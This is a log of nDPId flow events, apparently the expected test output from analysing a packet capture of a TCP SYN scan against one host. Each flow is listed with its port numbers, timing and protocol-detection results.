+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1112,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1113,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1114,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1114,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060693,"flow_last_seen":1278275060693,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1114,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060693,"flow_last_seen":1278275060693,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1114,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1071,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1117,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1071,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1117,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1117,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1117,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5214,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1119,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Starcraft","breed":"Fun","category":"Game"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5214,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1119,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Starcraft","breed":"Fun","category":"Game"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":805,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3168,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":805,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3168,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1121,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":850,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3168,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":850,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3168,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1121,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1122,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1122,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1122,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1122,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1123,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1124,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1124,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1123,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1124,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1124,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5221,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1126,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
